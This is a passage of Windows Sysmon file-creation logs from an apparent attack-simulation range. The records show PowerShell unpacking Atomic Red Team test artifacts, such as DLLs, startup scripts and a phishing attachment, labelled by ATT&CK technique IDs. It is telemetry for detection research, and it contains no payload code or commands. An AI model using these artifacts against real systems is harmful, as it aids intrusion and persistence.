07:59:07.361","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx86.dll","CreationUtcTime":"2020-08-01 07:59:07.361","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4786,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.377\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.377","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.377","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll","CreationUtcTime":"2020-08-01 07:59:07.377","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4787,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.393\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.393","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.393","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218.dll","CreationUtcTime":"2020-08-01 07:59:07.393","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4788,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.393\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\x64\\T1218.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.393","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.393","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\x64\\T1218.dll","CreationUtcTime":"2020-08-01 07:59:07.393","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4789,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:59:07.486\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1543.003\\bin\\AtomicService.exe\r\nCreationUtcTime: 2020-08-01 07:59:07.486","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:59:07.486","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1543.003\\bin\\AtomicService.exe","CreationUtcTime":"2020-08-01 07:59:07.486","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4790,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.533\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.533","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.533","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010.dll","CreationUtcTime":"2020-08-01 07:59:07.533","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4791,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.533\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010x86.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.533","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.533","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010x86.dll","CreationUtcTime":"2020-08-01 07:59:07.533","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4792,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.549\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.549","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.549","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.dll","CreationUtcTime":"2020-08-01 07:59:07.549","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4793,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:59:07.549\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.exe\r\nCreationUtcTime: 2020-08-01 07:59:07.549","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:59:07.549","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.exe","CreationUtcTime":"2020-08-01 07:59:07.549","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4794,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.580\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\bin\\T1546.015x64.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.580","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.580","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\bin\\T1546.015x64.dll","CreationUtcTime":"2020-08-01 07:59:07.580","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4795,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.580\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad.sln\r\nCreationUtcTime: 2020-08-01 07:59:07.580","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.580","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad.sln","CreationUtcTime":"2020-08-01 07:59:07.580","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4796,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.580\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad\\atomicNotepad.vcxproj\r\nCreationUtcTime: 2020-08-01 07:59:07.580","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.580","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad\\atomicNotepad.vcxproj","CreationUtcTime":"2020-08-01 07:59:07.580","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4797,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.596\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\x64\\Release\\atomicNotepad.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.596","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.596","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\x64\\Release\\atomicNotepad.dll","CreationUtcTime":"2020-08-01 07:59:07.596","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4798,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.611\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\batstartup.bat\r\nCreationUtcTime: 2020-08-01 07:59:07.611","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.611","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\batstartup.bat","CreationUtcTime":"2020-08-01 07:59:07.611","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4799,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.611\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\jsestartup.jse\r\nCreationUtcTime: 2020-08-01 07:59:07.611","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.611","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\jsestartup.jse","CreationUtcTime":"2020-08-01 07:59:07.611","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4800,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.611\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\vbsstartup.vbs\r\nCreationUtcTime: 2020-08-01 07:59:07.611","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.611","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\vbsstartup.vbs","CreationUtcTime":"2020-08-01 07:59:07.611","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4801,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.752\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1559.002\\src\\PowerShell_Script_For_DDE_Document.ps1\r\nCreationUtcTime: 2020-08-01 07:59:07.752","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.752","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1559.002\\src\\PowerShell_Script_For_DDE_Document.ps1","CreationUtcTime":"2020-08-01 07:59:07.752","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4802,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.799\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1564.004\\src\\test.ps1\r\nCreationUtcTime: 2020-08-01 07:59:07.799","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.799","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1564.004\\src\\test.ps1","CreationUtcTime":"2020-08-01 07:59:07.799","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4803,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.799\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1566.001\\bin\\PhishingAttachment.xlsm\r\nCreationUtcTime: 2020-08-01 07:59:07.799","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.799","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1566.001\\bin\\PhishingAttachment.xlsm","CreationUtcTime":"2020-08-01 07:59:07.799","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4804,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:59:07.830\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: 